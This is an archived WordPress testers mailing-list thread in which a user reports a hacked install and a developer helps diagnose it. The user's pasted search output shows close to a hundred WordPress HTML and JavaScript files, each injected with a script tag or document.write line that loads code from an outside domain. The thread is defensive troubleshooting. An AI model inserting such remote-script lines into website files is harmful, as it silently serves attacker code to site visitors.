[wp-testers] 2.8.6 Beta1

Dion Hulse (dd32) wordpress at dd32.id.au
Fri Nov 20 09:57:00 UTC 2009


it appears to have inserted that after </head> in all the .html and .php  
files it could find. and the document.write in all .js's.

I dont think its a WordPress vulnerability, as its affecting the files  
rather than actual posts..

I'd be tempted to suggest a full virus scan of your computer.. possibility  
its stealing your FTP credentials?

Any other websites on that account afected? what about files outside of  
Wordpress?

On Fri, 20 Nov 2009 20:53:10 +1100, Naudirz <naudirz at gmail.com> wrote:

> here are more info
>
> Search "northstarsocal.com" (98 hits in 98 files)
>   C:\Users\Användaren\Documents\Downloads\sidan\readme.html (1 hits)
>  Line 8: <script
> src=http://northstarsocal.com/testpage/contact.php></script><body>
>   C:\Users\Användaren\Documents\Downloads\sidan\wordpress.2009-11-20.xml  
> (1
> hits)
> Line 1: <script
> src=http://northstarsocal.com/testpage/contact.php></script><?xml
> version="1.0" encoding="UTF-8"?>
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-content\plugins\wp-security-scan\js\scripts.js
> (1 hits)
> Line 29: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-content\plugins\wp-security-scan\scripts.js
> (1 hits)
> Line 30: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\autosave.dev.js
> (1 hits)
> Line 309: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\autosave.js
> (1 hits)
> Line 2: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\codepress.html
> (1 hits)
> Line 30: if(engine == "msie" || engine == "gecko")  
> document.write('<script
> src=http://northstarsocal.com/testpage/contact.php ></script><body><pre>
> </pre></body>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\codepress.js
> (1 hits)
> Line 139: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\engines\gecko.js
> (1 hits)
> Line 294: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\engines\msie.js
> (1 hits)
> Line 305: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\engines\opera.js
> (1 hits)
> Line 262: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\asp.js
> (1 hits)
> Line 118: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\autoit.js
> (1 hits)
> Line 34: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\csharp.js
> (1 hits)
> Line 26: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\css.js
> (1 hits)
> Line 25: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\generic.js
> (1 hits)
> Line 27: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\html.js
> (1 hits)
> Line 61: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\java.js
> (1 hits)
> Line 26: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\javascript.js
> (1 hits)
> Line 32: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\perl.js
> (1 hits)
> Line 29: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\php.js
> (1 hits)
> Line 62: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\ruby.js
> (1 hits)
> Line 28: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\sql.js
> (1 hits)
> Line 32: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\text.js
> (1 hits)
> Line 11: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\vbscript.js
> (1 hits)
> Line 118: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\xsl.js
> (1 hits)
> Line 104: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\colorpicker.dev.js
> (1 hits)
> Line 709: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\colorpicker.js
> (1 hits)
> Line 2: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\comment-reply.dev.js
> (1 hits)
> Line 50: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\comment-reply.js
> (1 hits)
> Line 2: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\crop\cropper.js
> (1 hits)
> Line 518: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\hoverIntent.dev.js
> (1 hits)
> Line 129: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\hoverIntent.js
> (1 hits)
> Line 2: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\imgareaselect\jquery.imgareaselect.dev.js
> (1 hits)
> Line 693: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\imgareaselect\jquery.imgareaselect.js
> (1 hits)
> Line 2: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jcrop\jquery.Jcrop.dev.js
> (1 hits)
> Line 1199: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jcrop\jquery.Jcrop.js
> (1 hits)
> Line 164: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\interface.js
> (1 hits)
> Line 14: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.color.dev.js
> (1 hits)
> Line 130: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.color.js
> (1 hits)
> Line 2: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.form.dev.js
> (1 hits)
> Line 874: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.form.js
> (1 hits)
> Line 2: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.hotkeys.dev.js
> (1 hits)
> Line 129: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.hotkeys.js
> (1 hits)
> Line 2: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.js
> (1 hits)
> Line 22: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.schedule.js
> (1 hits)
> Line 37: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.table-hotkeys.dev.js
> (1 hits)
> Line 101: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.table-hotkeys.js
> (1 hits)
> Line 2: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\suggest.dev.js
> (1 hits)
> Line 331: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\suggest.js
> (1 hits)
> Line 2: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.core.js
> (1 hits)
> Line 11: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.dialog.js
> (1 hits)
> Line 16: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.draggable.js
> (1 hits)
> Line 14: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.droppable.js
> (1 hits)
> Line 15: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.resizable.js
> (1 hits)
> Line 14: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.selectable.js
> (1 hits)
> Line 14: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.sortable.js
> (1 hits)
> Line 14: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.tabs.js
> (1 hits)
> Line 14: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\json2.dev.js
> (1 hits)
> Line 483: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\json2.js  
> (1
> hits)
> Line 13: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\prototype.js
> (1 hits)
> Line 4185: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\quicktags.dev.js
> (1 hits)
> Line 579: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\quicktags.js
> (1 hits)
> Line 2: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\builder.js
> (1 hits)
> Line 138: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\controls.js
> (1 hits)
> Line 967: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\dragdrop.js
> (1 hits)
> Line 976: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\effects.js
> (1 hits)
> Line 1124: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\prototype.js
> (1 hits)
> Line 4185: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\scriptaculous.js
> (1 hits)
> Line 59: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\slider.js
> (1 hits)
> Line 277: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\sound.js
> (1 hits)
> Line 57: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\unittest.js
> (1 hits)
> Line 569: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\wp-scriptaculous.js
> (1 hits)
> Line 61: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfobject.js
> (1 hits)
> Line 6: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\handlers.dev.js
> (1 hits)
> Line 339: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\handlers.js
> (1 hits)
> Line 2: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\plugins\swfupload.cookies.js
> (1 hits)
> Line 55: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\plugins\swfupload.queue.js
> (1 hits)
> Line 100: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\plugins\swfupload.speed.js
> (1 hits)
> Line 343: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\plugins\swfupload.swfobject.js
> (1 hits)
> Line 107: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\swfupload-all.js
> (1 hits)
> Line 10: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\swfupload.js
> (1 hits)
> Line 982: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\thickbox\thickbox.js
> (1 hits)
> Line 323: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\blank.htm
> (1 hits)
> Line 6: <script
> src=http://northstarsocal.com/testpage/contact.php></script><body
> class="mceContentBody">
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\langs\wp-langs-en.js
> (1 hits)
> Line 433: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\tiny_mce.js
> (1 hits)
> Line 3: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\tiny_mce_popup.js
> (1 hits)
> Line 6: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\utils\editable_selects.js
> (1 hits)
> Line 71: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\utils\form_utils.js
> (1 hits)
> Line 201: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\utils\mctabs.js
> (1 hits)
> Line 78: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\utils\validate.js
> (1 hits)
> Line 221: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\wp-tinymce.js
> (1 hits)
> Line 30: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tw-sack.dev.js
> (1 hits)
> Line 195: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tw-sack.js  
> (1
> hits)
> Line 2: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\wp-ajax-response.dev.js
> (1 hits)
> Line 66: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\wp-ajax-response.js
> (1 hits)
> Line 2: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\wp-lists.dev.js
> (1 hits)
> Line 361: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>   C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\wp-lists.js
> (1 hits)
> Line 2: document.write('<script src=
> http://northstarsocal.com/testpage/contact.php ><\/script>');
>
>
>
> On Fri, Nov 20, 2009 at 9:57 AM, Dion Hulse (dd32)  
> <wordpress at dd32.id.au>wrote:
>
>> What are the symptoms of the hack?
>>
>> Install something to log all post requests ASAP, to gather data if its a
>> new vulnerability: http://www.village-idiot.org/post-logger
>>
>> You'd not by any chance be on MediaTemple servers would you? *(Who's  
>> your
>> webhost)
>>
>>
>> On Fri, 20 Nov 2009 19:52:46 +1100, Naudirz <naudirz at gmail.com> wrote:
>>
>>  OK, cause my 2.9 nightly gets hacked every day..
>>> in that case its a new security bug..
>>> Ive wasted every file/folde an done a fresh installation, everything
>>> except
>>> the db is new, also passwd is changed on everything except db.
>>> No extra user is in db.
>>>
>>>
>>>
>>> On Fri, Nov 20, 2009 at 9:39 AM, Dion Hulse (dd32)  
>>> <wordpress at dd32.id.au
>>> >wrote:
>>>
>>>  Yes. Everything in the 2.8 branch are backports from the 2.9 branch.
>>>>
>>>>
>>>>
>>>> On Fri, 20 Nov 2009 19:35:20 +1100, Naudirz <naudirz at gmail.com> wrote:
>>>>
>>>>  Hi!
>>>>
>>>>> Is this fix also in 2.9 nightlybuild?
>>>>>
>>>>> /Phibrz
>>>>>
>>>>> On Thu, Nov 12, 2009 at 5:43 PM, Ryan Boren <ryan at boren.nu> wrote:
>>>>>
>>>>>  http://wordpress.org/wordpress-2.8.6-beta1.zip
>>>>>
>>>>>>
>>>>>> Fixes these two security issues:
>>>>>>
>>>>>>
>>>>>>
>>>>>>
>>>>>> https://core.trac.wordpress.org/query?status=closed&group=resolution&milestone=2.8.6
>>>>>>
>>>>>> A logged in user with author privileges is required to exploit.   
>>>>>> Press
>>>>>> This and uploads need testing.
>>>>>> _______________________________________________
>>>>>> wp-testers mailing list
>>>>>> wp-testers at lists.automattic.com
>>>>>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>>>>>
>>>>>>  _______________________________________________
>>>>>>
>>>>> wp-testers mailing list
>>>>> wp-testers at lists.automattic.com
>>>>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>>>>
>>>>>
>>>>>
>>>> --
>>>> Using Opera's revolutionary e-mail client: http://www.opera.com/mail/
>>>>
>>>> _______________________________________________
>>>> wp-testers mailing list
>>>> wp-testers at lists.automattic.com
>>>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>>>
>>>>  _______________________________________________
>>> wp-testers mailing list
>>> wp-testers at lists.automattic.com
>>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>>
>>>
>>
>> --
>> Using Opera's revolutionary e-mail client: http://www.opera.com/mail/
>> _______________________________________________
>> wp-testers mailing list
>> wp-testers at lists.automattic.com
>> http://lists.automattic.com/mailman/listinfo/wp-testers
>>
> _______________________________________________
> wp-testers mailing list
> wp-testers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-testers
>


-- 
Using Opera's revolutionary e-mail client: http://www.opera.com/mail/


More information about the wp-testers mailing list